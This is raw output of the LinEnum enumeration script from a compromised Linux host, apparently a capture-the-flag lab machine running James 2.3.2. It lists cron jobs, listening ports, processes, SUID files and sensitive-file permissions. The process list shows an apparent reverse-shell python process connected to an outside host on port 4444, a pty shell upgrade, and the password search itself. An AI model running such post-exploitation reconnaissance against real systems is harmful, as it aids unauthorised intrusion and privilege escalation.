/etc/cron.hourly:
total 20
drwxr-xr-x 2 root root 4096 Jun 18 2017 .
drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
-rw-r--r-- 1 root root 102 May 3 2015 .placeholder
/etc/cron.monthly:
total 24
drwxr-xr-x 2 root root 4096 Jun 18 2017 .
drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
-rwxr-xr-x 1 root root 313 May 29 2017 0anacron
-rw-r--r-- 1 root root 102 May 3 2015 .placeholder
/etc/cron.weekly:
total 28
drwxr-xr-x 2 root root 4096 Jun 18 2017 .
drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
-rwxr-xr-x 1 root root 312 May 29 2017 0anacron
-rwxr-xr-x 1 root root 723 Dec 13 2016 man-db
-rw-r--r-- 1 root root 102 May 3 2015 .placeholder
Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
Anacron jobs and associated file permissions:
-rw-r--r-- 1 root root 401 May 29 2017 /etc/anacrontab
# /etc/anacrontab: configuration file for anacron
# See anacron(8) and anacrontab(5) for details.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root
# These replace cron's entries
1 5 cron.daily run-parts --report /etc/cron.daily
7 10 cron.weekly run-parts --report /etc/cron.weekly
@monthly 15 cron.monthly run-parts --report /etc/cron.monthly
When were jobs last executed (/var/spool/anacron contents):
total 20
drwxr-xr-x 2 root root 4096 Jun 18 2017 .
drwxr-xr-x 7 root root 4096 Jun 18 2017 ..
-rw------- 1 root root 9 Jan 17 10:43 cron.daily
-rw------- 1 root root 9 Jan 17 10:53 cron.monthly
-rw------- 1 root root 9 Jan 17 10:48 cron.weekly
### NETWORKING ##########################################
Network & IP info:
ens33: flags=4163 mtu 1500
inet 10.10.10.51 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb2:c91f prefixlen 64 scopeid 0x20
inet6 dead:beef::250:56ff:feb2:c91f prefixlen 64 scopeid 0x0
ether 00:50:56:b2:c9:1f txqueuelen 1000 (Ethernet)
RX packets 10438 bytes 993880 (970.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 466 bytes 62037 (60.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2000

lo: flags=73 mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1 (Local Loopback)
RX packets 41828 bytes 3387546 (3.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 41828 bytes 3387546 (3.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 10.10.10.51:57234 10.10.14.16:80 TIME_WAIT -
tcp 0 0 10.10.10.51:22 10.10.14.16:54760 ESTABLISHED -
tcp 0 1139 10.10.10.51:43642 10.10.14.16:4444 ESTABLISHED 1369/python
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
tcp6 0 0 :::119 :::* LISTEN -
tcp6 0 0 :::25 :::* LISTEN -
tcp6 0 0 :::4555 :::* LISTEN -
tcp6 0 0 :::110 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp 0 0 0.0.0.0:33663 0.0.0.0:* -
udp 0 0 0.0.0.0:5353 0.0.0.0:* -
udp 0 0 0.0.0.0:1900 0.0.0.0:* -
udp6 0 0 :::53936 :::* -
udp6 0 0 :::5353 :::* -
### SERVICES #############################################
Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 1.0 26952 5500 ? Ss 10:38 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S 10:38 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 10:38 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 10:38 0:00 [kworker/0:0H]
root 6 0.0 0.0 0 0 ? S 10:38 0:00 [kworker/u2:0]
root 7 0.0 0.0 0 0 ? S 10:38 0:00 [rcu_sched]
root 8 0.0 0.0 0 0 ? S 10:38 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? S 10:38 0:00 [migration/0]
root 10 0.0 0.0 0 0 ? S< 10:38 0:00 [lru-add-drain]
root 11 0.0 0.0 0 0 ? S 10:38 0:00 [watchdog/0]
root 12 0.0 0.0 0 0 ? S 10:38 0:00 [cpuhp/0]
root 13 0.0 0.0 0 0 ? S 10:38 0:00 [kdevtmpfs]
root 14 0.0 0.0 0 0 ? S< 10:38 0:00 [netns]
root 15 0.0 0.0 0 0 ? S 10:38 0:00 [khungtaskd]
root 16 0.0 0.0 0 0 ? S 10:38 0:00 [oom_reaper]
root 17 0.0 0.0 0 0 ? S< 10:38 0:00 [writeback]
root 18 0.0 0.0 0 0 ? S 10:38 0:00 [kcompactd0]
root 19 0.0 0.0 0 0 ? SN 10:38 0:00 [ksmd]
root 21 0.0 0.0 0 0 ? S< 10:38 0:00 [crypto]
root 22 0.0 0.0 0 0 ? S< 10:38 0:00 [kintegrityd]
root 23 0.0 0.0 0 0 ? S< 10:38 0:00 [bioset]
root 24 0.0 0.0 0 0 ? S< 10:38 0:00 [kblockd]
root 25 0.0 0.0 0 0 ? S< 10:38 0:00 [devfreq_wq]
root 26 0.0 0.0 0 0 ? S< 10:38 0:00 [watchdogd]
root 27 0.0 0.0 0 0 ? S 10:38 0:00 [kswapd0]
root 28 0.0 0.0 0 0 ? S< 10:38 0:00 [vmstat]
root 40 0.0 0.0 0 0 ? S< 10:38 0:00 [kthrotld]
root 42 0.0 0.0 0 0 ? S< 10:38 0:00 [ipv6_addrconf]
root 82 0.0 0.0 0 0 ? S< 10:38 0:00 [ata_sff]
root 84 0.0 0.0 0 0 ? S< 10:38 0:00 [mpt_poll_0]
root 85 0.0 0.0 0 0 ? S< 10:38 0:00 [mpt/0]
root 104 0.0 0.0 0 0 ? S 10:38 0:00 [scsi_eh_0]
root 105 0.0 0.0 0 0 ? S< 10:38 0:00 [scsi_tmf_0]
root 106 0.0 0.0 0 0 ? S 10:38 0:00 [scsi_eh_1]
root 107 0.0 0.0 0 0 ? S< 10:38 0:00 [bioset]
root 109 0.0 0.0 0 0 ? S< 10:38 0:00 [scsi_tmf_1]
root 111 0.0 0.0 0 0 ? S 10:38 0:00 [scsi_eh_2]
root 113 0.0 0.0 0 0 ? S< 10:38 0:00 [scsi_tmf_2]
root 115 0.0 0.0 0 0 ? S 10:38 0:00 [kworker/u2:2]
root 128 0.0 0.0 0 0 ? S< 10:38 0:00 [bioset]
root 130 0.0 0.0 0 0 ? S< 10:38 0:00 [kworker/0:1H]
root 166 0.0 0.0 0 0 ? S 10:38 0:00 [jbd2/sda1-8]
root 167 0.0 0.0 0 0 ? S< 10:38 0:00 [ext4-rsv-conver]
root 196 0.0 0.8 24792 4312 ? Ss 10:38 0:00 /lib/systemd/systemd-journald
root 201 0.0 0.0 0 0 ? S 10:38 0:00 [kauditd]
root 219 0.0 0.5 16084 3012 ? Ss 10:38 0:00 /lib/systemd/systemd-udevd
systemd+ 271 0.0 0.7 16964 3888 ? Ssl 10:38 0:00 /lib/systemd/systemd-timesyncd
root 273 0.0 0.0 0 0 ? S< 10:38 0:00 [nfit]
root 276 0.0 0.0 0 0 ? S< 10:38 0:00 [ttm_swap]
root 366 0.0 1.0 50876 5456 ? Ssl 10:38 0:00 /usr/sbin/ModemManager
root 368 0.0 0.4 5264 2512 ? Ss 10:38 0:00 /usr/sbin/cron -f
root 370 0.0 0.0 2332 444 ? Ss 10:38 0:00 /bin/sh /opt/james-2.3.2/bin/run.sh
message+ 372 0.0 0.7 6836 4040 ? Ss 10:38 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 380 0.1 8.1 441760 41628 ? Sl 10:38 0:09 /usr/lib/jvm/java-8-openjdk-i386//bin/java -Djava.ext.dirs=/opt/james-2.3.2/lib:/opt/james-2.3.2/tools/lib -Djava.security.manager -Djava.security.policy=jar:file:/opt/james-2.3.2/bin/phoenix-loader.jar!/META-INF/java.policy -Dnetworkaddress.cache.ttl=300 -Dphoenix.home=/opt/james-2.3.2 -Djava.io.tmpdir=/opt/james-2.3.2/temp -jar /opt/james-2.3.2/bin/phoenix-loader.jar
root 404 0.0 2.1 84144 10796 ? Ssl 10:38 0:00 /usr/sbin/NetworkManager --no-daemon
root 406 0.0 1.1 38336 5896 ? Ssl 10:38 0:00 /usr/lib/accountsservice/accounts-daemon
root 407 0.0 0.8 7432 4204 ? Ss 10:38 0:00 /lib/systemd/systemd-logind
avahi 408 0.0 0.5 6256 2964 ? Ss 10:38 0:03 avahi-daemon: running [solidstate.local]
rtkit 409 0.0 0.5 24100 2720 ? SNsl 10:38 0:00 /usr/lib/rtkit/rtkit-daemon
root 411 0.0 0.5 23108 2684 ? Ssl 10:38 0:00 /usr/sbin/rsyslogd -n
root 418 0.0 1.5 38624 7692 ? Ssl 10:38 0:00 /usr/lib/policykit-1/polkitd --no-debug
avahi 424 0.0 0.0 6256 60 ? S 10:38 0:00 avahi-daemon: chroot helper
root 532 0.0 0.9 10472 5088 ? Ss 10:38 0:00 /usr/sbin/sshd -D
root 539 0.0 0.0 2236 60 ? Ss 10:38 0:00 /usr/sbin/minissdpd -i 0.0.0.0
root 553 0.0 1.3 40204 6696 ? Ssl 10:38 0:00 /usr/sbin/gdm3
root 562 0.0 1.3 31512 6820 ? Sl 10:38 0:00 gdm-session-worker [pam/gdm-launch-environment]
root 580 0.0 0.7 6408 3676 ? Ss 10:38 0:00 /usr/sbin/apache2 -k start
www-data 583 0.0 0.6 228916 3280 ? Sl 10:38 0:01 /usr/sbin/apache2 -k start
www-data 584 0.0 0.6 228916 3280 ? Sl 10:38 0:01 /usr/sbin/apache2 -k start
Debian-+ 639 0.0 1.1 9456 5788 ? Ss 10:38 0:00 /lib/systemd/systemd --user
Debian-+ 640 0.0 0.1 10560 812 ? S 10:38 0:00 (sd-pam)
Debian-+ 644 0.0 0.8 27632 4284 tty1 Ssl+ 10:38 0:00 /usr/lib/gdm3/gdm-wayland-session gnome-session --autostart /usr/share/gdm/greeter/autostart
Debian-+ 646 0.0 0.7 6368 3680 ? Ss 10:38 0:00 /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation
Debian-+ 648 0.0 1.9 75152 9844 tty1 Sl+ 10:38 0:00 /usr/lib/gnome-session/gnome-session-binary --autostart /usr/share/gdm/greeter/autostart
Debian-+ 681 0.1 21.8 825052 111300 tty1 Sl+ 10:38 0:12 /usr/bin/gnome-shell
root 687 0.0 1.4 50320 7400 ? Ssl 10:38 0:00 /usr/lib/upower/upowerd
Debian-+ 711 0.0 4.7 81916 24416 tty1 S+ 10:38 0:00 /usr/bin/Xwayland :1024 -rootless -noreset -listen 4 -listen 5 -displayfd 6
Debian-+ 730 0.0 1.1 44412 5888 ? Ssl 10:38 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher
Debian-+ 735 0.0 0.6 6260 3308 ? S 10:38 0:00 /usr/bin/dbus-daemon --config-file=/usr/share/defaults/at-spi2/accessibility.conf --nofork --print-address 3
Debian-+ 737 0.0 1.1 30484 5956 ? Sl 10:38 0:00 /usr/lib/at-spi2-core/at-spi2-registryd --use-gnome-session
Debian-+ 741 0.0 1.8 888536 9564 ? Ssl 10:38 0:00 /usr/bin/pulseaudio --daemonize=no
root 780 0.0 0.9 10772 4624 ? Ss 10:38 0:00 /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root 781 0.0 2.1 46496 10996 ? Ssl 10:38 0:00 /usr/lib/packagekit/packagekitd
Debian-+ 782 0.0 7.5 448652 38464 tty1 Sl+ 10:38 0:00 /usr/lib/gnome-settings-daemon/gnome-settings-daemon
colord 799 0.0 2.6 45664 13308 ? Ssl 10:38 0:00 /usr/lib/colord/colord
root 965 0.0 1.3 14652 6772 ? Ss 10:43 0:00 /usr/sbin/cupsd -l
root 967 0.0 1.3 35424 6848 ? Ssl 10:43 0:00 /usr/sbin/cups-browsed
root 1319 0.0 0.0 0 0 ? S 12:34 0:00 [kworker/0:1]
root 1332 0.0 0.0 0 0 ? S 12:39 0:00 [kworker/0:2]
root 1338 0.0 1.2 11156 6292 ? Ss 12:43 0:00 sshd: mindy [priv]
mindy 1340 0.0 1.1 9488 5632 ? Ss 12:43 0:00 /lib/systemd/systemd --user
mindy 1341 0.0 0.2 28008 1028 ? S 12:43 0:00 (sd-pam)
mindy 1349 0.0 0.7 11156 3708 ? S 12:43 0:00 sshd: mindy@pts/0
mindy 1350 0.0 0.7 6464 4024 pts/0 Ss+ 12:43 0:00 -rbash
mindy 1369 0.0 1.6 13380 8536 pts/0 S+ 12:43 0:00 python -c exec('<base64 payload omitted>'.decode('base64'))
mindy 1370 0.0 0.6 5236 3080 pts/0 S+ 12:43 0:00 /bin/bash
root 1374 0.0 0.0 0 0 ? S 12:44 0:00 [kworker/0:0]
mindy 1375 0.0 1.1 10140 5740 pts/0 S+ 12:44 0:00 python -c import pty; pty.spawn("/bin/bash")
mindy 1376 0.0 0.7 5660 3584 pts/1 Ss 12:44 0:00 /bin/bash
mindy 1397 0.3 0.5 5324 2920 pts/1 S+ 12:49 0:00 /bin/bash ./LinEnum.sh -t -k password
mindy 1751 0.0 0.3 5300 1964 pts/1 S+ 12:49 0:00 /bin/bash ./LinEnum.sh -t -k password
mindy 1752 0.0 0.6 7672 3200 pts/1 R+ 12:49 0:00 ps aux

Process binaries & associated permissions (from above list):
936K -rwxr-xr-x 1 root root 935K Jun 17 2017 /usr/sbin/sshd
696K -rwxr-xr-x 1 root root 695K Jan 18 2017 /usr/sbin/rsyslogd
2.7M -rwxr-xr-x 1 root root 2.7M Mar 18 2017 /usr/sbin/NetworkManager
1.4M -rwxr-xr-x 1 root root 1.4M Nov 16 2016 /usr/sbin/ModemManager
32K -rwxr-xr-x 1 root root 30K May 8 2017 /usr/sbin/minissdpd
432K -rwxr-xr-x 1 root root 432K Jun 6 2017 /usr/sbin/gdm3
496K -rwxr-xr-x 1 root root 494K Jan 31 2017 /usr/sbin/cupsd
172K -rwxr-xr-x 1 root root 170K Jan 19 2017 /usr/sbin/cups-browsed
48K -rwxr-xr-x 1 root root 47K May 3 2015 /usr/sbin/cron
636K -rwxr-xr-x 1 root root 633K Jul 18 2017 /usr/sbin/apache2
248K -rwxr-xr-x 1 root root 246K Sep 19 2016 /usr/lib/upower/upowerd
64K -rwxr-xr-x 1 root root 63K Oct 24 2015 /usr/lib/rtkit/rtkit-daemon
16K -rwxr-xr-x 1 root root 14K May 24 2017 /usr/lib/policykit-1/polkitd
308K -rwxr-xr-x 1 root root 306K Mar 8 2017 /usr/lib/packagekit/packagekitd
0 lrwxrwxrwx 1 root root 15 Jul 23 08:12 /usr/lib/jvm/java-8-openjdk-i386//bin/java -> ../jre/bin/java
40K -rwxr-xr-x 1 root root 39K Apr 24 2017 /usr/lib/gnome-settings-daemon/gnome-settings-daemon
312K -rwxr-xr-x 1 root root 312K Mar 9 2017 /usr/lib/gnome-session/gnome-session-binary
60K -rwxr-xr-x 1 root root 59K Jun 6 2017 /usr/lib/gdm3/gdm-wayland-session
324K -rwxr-xr-x 1 root root 322K Sep 6 2016 /usr/lib/colord/colord
20K -rwxr-xr-x 1 root root 18K May 9 2017 /usr/lib/at-spi2-core/at-spi-bus-launcher
92K -rwxr-xr-x 1 root root 89K May 9 2017 /usr/lib/at-spi2-core/at-spi2-registryd
156K -rwxr-xr-x 1 root root 155K Dec 29 2016 /usr/lib/accountsservice/accounts-daemon
2.4M -rwxr-xr-x 1 root root 2.4M Jul 7 2017 /usr/bin/Xwayland
88K -rwxr-xr-x 1 root root 86K Jan 19 2017 /usr/bin/pulseaudio
16K -rwxr-xr-x 1 root root 14K Apr 26 2017 /usr/bin/gnome-shell
256K -rwxr-xr-x 1 root root 254K Apr 5 2017 /usr/bin/dbus-daemon
2.4M -rwxr-xr-x 1 root root 2.4M Feb 20 2017 /sbin/wpa_supplicant
0 lrwxrwxrwx 1 root root 20 Jun 4 2017 /sbin/init -> /lib/systemd/systemd
452K -rwxr-xr-x 1 root root 450K Jun 4 2017 /lib/systemd/systemd-udevd
40K -rwxr-xr-x 1 root root 38K Jun 4 2017 /lib/systemd/systemd-timesyncd
208K -rwxr-xr-x 1 root root 206K Jun 4 2017 /lib/systemd/systemd-logind
116K -rwxr-xr-x 1 root root 114K Jun 4 2017 /lib/systemd/systemd-journald
1.1M -rwxr-xr-x 1 root root 1.1M Jun 4 2017 /lib/systemd/systemd
0 lrwxrwxrwx 1 root root 4 Jan 24 2017 /bin/sh -> dash
1.3M -rwxr-xr-x 1 root root 1.3M May 15 2017 /bin/bash
.
.
/etc/init.d/ binary permissions:
total 148
drwxr-xr-x 2 root root 4096 Aug 22 13:21 .
drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
-rwxr-xr-x 1 root root 5336 Feb 1 2016 alsa-utils
-rwxr-xr-x 1 root root 2014 May 29 2017 anacron
-rwxr-xr-x 1 root root 8181 Jul 18 2017 apache2
-rwxr-xr-x 1 root root 2225 Jul 18 2017 apache-htcacheclean
-rwxr-xr-x 1 root root 2401 Jan 23 2017 avahi-daemon
-rwxr-xr-x 1 root root 2948 Oct 24 2016 bluetooth
-rwxr-xr-x 1 root root 1232 Apr 6 2017 console-setup.sh
-rwxr-xr-x 1 root root 3049 May 3 2015 cron
-rwxr-xr-x 1 root root 2816 Jan 18 2017 cups
-rwxr-xr-x 1 root root 1961 Jan 19 2017 cups-browsed
-rwxr-xr-x 1 root root 2813 Apr 5 2017 dbus
-rwxr-xr-x 1 root root 3033 May 20 2014 gdm3
-rwxr-xr-x 1 root root 3809 Mar 22 2017 hwclock.sh
-rwxr-xr-x 1 root root 1479 May 18 2016 keyboard-setup.sh
-rwxr-xr-x 1 root root 2044 Dec 25 2016 kmod
-rwxr-xr-x 1 root root 2241 Apr 26 2017 minissdpd
-rwxr-xr-x 1 root root 4597 Sep 16 2016 networking
-rwxr-xr-x 1 root root 1757 Mar 18 2017 network-manager
-rwxr-xr-x 1 root root 612 Dec 4 2015 pppd-dns
-rwxr-xr-x 1 root root 1191 Nov 22 2016 procps
-rwxr-xr-x 1 root root 4355 Jul 10 2014 rsync
-rwxr-xr-x 1 root root 2868 Jan 18 2017 rsyslog
-rwxr-xr-x 1 root root 2330 May 21 2017 saned
-rwxr-xr-x 1 root root 2117 Jan 9 2017 speech-dispatcher
-rwxr-xr-x 1 root root 4033 Jun 17 2017 ssh
-rwxr-xr-x 1 root root 6087 Jun 4 2017 udev
-rwxr-xr-x 1 root root 1391 May 6 2017 unattended-upgrades
-rwxr-xr-x 1 root root 2757 Nov 23 2016 x11-common
.
.
### SOFTWARE #############################################
Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
.
.
Anything in the Apache home dirs?:
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Aug 22 13:21 .
drwxr-xr-x 12 root root 4.0K Aug 22 13:21 ..
drwxr-xr-x 4 root root 4.0K Aug 22 13:31 html
.
/var/www/html:
total 68K
drwxr-xr-x 4 root root 4.0K Aug 22 13:31 .
drwxr-xr-x 3 root root 4.0K Aug 22 13:21 ..
-rw-r--r-- 1 root root 7.1K Jul 18 2017 about.html
drwxr-xr-x 6 root root 4.0K Jul 18 2017 assets
drwxr-xr-x 2 root root 4.0K Jul 18 2017 images
-rw-r--r-- 1 root root 7.6K Aug 22 13:31 index.html
-rw-r--r-- 1 root root 17K Jul 18 2017 LICENSE.txt
-rw-r--r-- 1 root root 963 Jul 18 2017 README.txt
-rw-r--r-- 1 root root 8.3K Jul 18 2017 services.html
.
/var/www/html/assets:
total 24K
drwxr-xr-x 6 root root 4.0K Jul 18 2017 .
drwxr-xr-x 4 root root 4.0K Aug 22 13:31 ..
drwxr-xr-x 3 root root 4.0K Jul 18 2017 css
drwxr-xr-x 2 root root 4.0K Jul 18 2017 fonts
drwxr-xr-x 3 root root 4.0K Jul 18 2017 js
drwxr-xr-x 6 root root 4.0K Jul 18 2017 sass
.
/var/www/html/assets/css:
total 124K
drwxr-xr-x 3 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 29K Jul 18 2017 font-awesome.min.css
-rw-r--r-- 1 root root 2.5K Jul 18 2017 ie8.css
-rw-r--r-- 1 root root 1.3K Jul 18 2017 ie9.css
drwxr-xr-x 2 root root 4.0K Jul 18 2017 images
-rw-r--r-- 1 root root 71K Jul 18 2017 main.css
.
/var/www/html/assets/css/images:
total 12K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 3 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 246 Jul 18 2017 close.svg
.
/var/www/html/assets/fonts:
total 908K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 123K Jul 18 2017 FontAwesome.otf
-rw-r--r-- 1 root root 75K Jul 18 2017 fontawesome-webfont.eot
-rw-r--r-- 1 root root 383K Jul 18 2017 fontawesome-webfont.svg
-rw-r--r-- 1 root root 150K Jul 18 2017 fontawesome-webfont.ttf
-rw-r--r-- 1 root root 89K Jul 18 2017 fontawesome-webfont.woff
-rw-r--r-- 1 root root 71K Jul 18 2017 fontawesome-webfont.woff2
.
/var/www/html/assets/js:
total 144K
drwxr-xr-x 3 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
drwxr-xr-x 2 root root 4.0K Jul 18 2017 ie
-rw-r--r-- 1 root root 94K Jul 18 2017 jquery.min.js
-rw-r--r-- 1 root root 2.3K Jul 18 2017 jquery.scrollex.min.js
-rw-r--r-- 1 root root 3.2K Jul 18 2017 main.js
-rw-r--r-- 1 root root 8.9K Jul 18 2017 skel.min.js
-rw-r--r-- 1 root root 13K Jul 18 2017 util.js
.
/var/www/html/assets/js/ie:
total 68K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 3 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 3.8K Jul 18 2017 backgroundsize.min.htc
-rw-r--r-- 1 root root 2.4K Jul 18 2017 html5shiv.js
-rw-r--r-- 1 root root 41K Jul 18 2017 PIE.htc
-rw-r--r-- 1 root root 4.5K Jul 18 2017 respond.min.js
.
/var/www/html/assets/sass:
total 36K
drwxr-xr-x 6 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
drwxr-xr-x 2 root root 4.0K Jul 18 2017 base
drwxr-xr-x 2 root root 4.0K Jul 18 2017 components
-rw-r--r-- 1 root root 2.8K Jul 18 2017 ie8.scss
-rw-r--r-- 1 root root 1.6K Jul 18 2017 ie9.scss
drwxr-xr-x 2 root root 4.0K Jul 18 2017 layout
drwxr-xr-x 2 root root 4.0K Jul 18 2017 libs
-rw-r--r-- 1 root root 1.3K Jul 18 2017 main.scss
.
/var/www/html/assets/sass/base:
total 16K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 1.2K Jul 18 2017 _page.scss
-rw-r--r-- 1 root root 4.0K Jul 18 2017 _typography.scss
.
/var/www/html/assets/sass/components:
total 48K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 517 Jul 18 2017 _box.scss
-rw-r--r-- 1 root root 1.8K Jul 18 2017 _button.scss
-rw-r--r-- 1 root root 1.9K Jul 18 2017 _features.scss
-rw-r--r-- 1 root root 3.8K Jul 18 2017 _form.scss
-rw-r--r-- 1 root root 288 Jul 18 2017 _icon.scss
-rw-r--r-- 1 root root 889 Jul 18 2017 _image.scss
-rw-r--r-- 1 root root 4.8K Jul 18 2017 _list.scss
-rw-r--r-- 1 root root 249 Jul 18 2017 _section.scss
-rw-r--r-- 1 root root 1.3K Jul 18 2017 _table.scss
.
/var/www/html/assets/sass/layout:
total 32K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 3.2K Jul 18 2017 _banner.scss
-rw-r--r-- 1 root root 2.9K Jul 18 2017 _footer.scss
-rw-r--r-- 1 root root 2.7K Jul 18 2017 _header.scss
-rw-r--r-- 1 root root 2.8K Jul 18 2017 _menu.scss
-rw-r--r-- 1 root root 6.2K Jul 18 2017 _wrapper.scss
.
/var/www/html/assets/sass/libs:
total 48K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 6 root root 4.0K Jul 18 2017 ..
-rw-r--r-- 1 root root 787 Jul 18 2017 _functions.scss
-rw-r--r-- 1 root root 9.2K Jul 18 2017 _mixins.scss
-rw-r--r-- 1 root root 17K Jul 18 2017 _skel.scss
-rw-r--r-- 1 root root 1.1K Jul 18 2017 _vars.scss
.
/var/www/html/images:
total 784K
drwxr-xr-x 2 root root 4.0K Jul 18 2017 .
drwxr-xr-x 4 root root 4.0K Aug 22 13:31 ..
-rw-r--r-- 1 root root 11K Jul 18 2017 bg.jpg
-rw-r--r-- 1 root root 14K Jul 18 2017 pic01.jpg
-rw-r--r-- 1 root root 330K Jul 18 2017 pic02.jpg
-rw-r--r-- 1 root root 7.6K Jul 18 2017 pic03.jpg
-rw-r--r-- 1 root root 116K Jul 18 2017 pic04.jpg
-rw-r--r-- 1 root root 57K Jul 18 2017 pic05.jpg
-rw-r--r-- 1 root root 183K Jul 18 2017 pic06.jpg
-rw-r--r-- 1 root root 33K Jul 18 2017 pic07.jpg
-rw-r--r-- 1 root root 9.9K Jul 18 2017 pic08.jpg
.
.
### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
.
.
Installed compilers:
ii libllvm3.9:i386 1:3.9.1-9 i386 Modular compiler and toolchain technologies, runtime library
ii libxkbcommon0:i386 0.7.1-1 i386 library interface to the XKB compiler - shared library
.
.
Can we read/write sensitive files:
-rw-r--r-- 1 root root 2107 Aug 22 13:52 /etc/passwd
-rw-r--r-- 1 root root 909 Aug 22 11:37 /etc/group
-rw-r--r-- 1 root root 767 Mar 4 2016 /etc/profile
-rw-r----- 1 root shadow 1375 Aug 22 11:39 /etc/shadow
.
.
SUID files:
-rwsr-xr-x 1 root root 39144 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 38940 Mar 22 2017 /bin/mount
-rwsr-xr-x 1 root root 30112 Jun 23 2016 /bin/fusermount
-rwsr-xr-x 1 root root 68076 Nov 10 2016 /bin/ping
-rwsr-xr-x 1 root root 161520 Feb 26 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26504 Mar 22 2017 /bin/umount
-rwsr-xr-x 1 root root 34920 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 22304 May 24 2017 /usr/bin/pkexec
-rwsr-xr-x 1 root root 57972 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 39632 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 48560 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 78340 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-- 1 root dip 363140 Nov 11 2016 /usr/sbin/pppd
-rwsr-xr-x 1 root root 13960 May 24 2017 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 525932 Jun 17 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5480 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 46436 Apr 5 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 9772 Jul 7 2017 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 13672 Jan 14 2017 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
.
.
GUID files:
-rwxr-sr-x 1 root shadow 34568 May 27 2017 /sbin/unix_chkpwd
-rwxr-sr-x 1 root tty 26416 Mar 22 2017 /usr/bin/wall
-rwxr-sr-x 1 root shadow 22040 May 17 2017 /usr/bin/expiry
-rwxr-sr-x 1 root tty 9820 Apr 12 2017 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 66120 May 17 2017 /usr/bin/chage
-rwxr-sr-x 1 root crontab 39056 May 3 2015 /usr/bin/crontab
-rwxr-sr-x 1 root mail 18084 Jan 17 2017 /usr/bin/dotlockfile
